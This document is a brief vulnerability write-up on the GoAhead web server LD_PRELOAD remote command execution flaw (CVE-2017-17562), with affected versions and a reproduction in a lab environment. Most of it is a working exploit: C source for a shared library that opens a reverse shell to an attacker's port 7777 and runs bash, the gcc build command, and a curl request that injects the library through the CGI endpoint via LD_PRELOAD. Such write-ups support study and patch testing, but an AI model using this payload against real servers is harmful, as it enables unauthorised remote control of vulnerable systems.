Goahead Ld_preload Remote Command Execution Vulnerability Cve 2017 17562

Goahead LD_PRELOAD Remote Command Execution Vulnerability CVE-2017-17562

Vulnerability Description

GoAhead supports running ASP, Javascript and standard CGI programs. This vulnerability comes from CGI programs.

This vulnerability uses the HTTP request parameter when the server initializes CGI, and uses a special parameter name LD_PRELOAD to hijack the libc library, thereby realizing remote command execution

Vulnerability Impact

GoAhead Web Server < 3.6.5

Network surveying and mapping

app=”GoAhead”

Vulnerability reappears

Use the shooting range under Vulnhub to build

Compile malicious so file

#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>

char *server_ip="";
uint32_t server_port=7777;

static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void) 
{
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in attacker_addr = {0};
  attacker_addr.sin_family = AF_INET;
  attacker_addr.sin_port = htons(server_port);
  attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
  if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
    exit(0);
  dup2(sock, 0);
  dup2(sock, 1);
  dup2(sock, 2);
  execve("/bin/bash", 0, 0);
}
gcc evil.c -fPIC -s -shared -o evil.so

Send evil.so malicious file

curl -X POST --data-binary @evil.so https://xxx.xxx.xxx.xxx:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0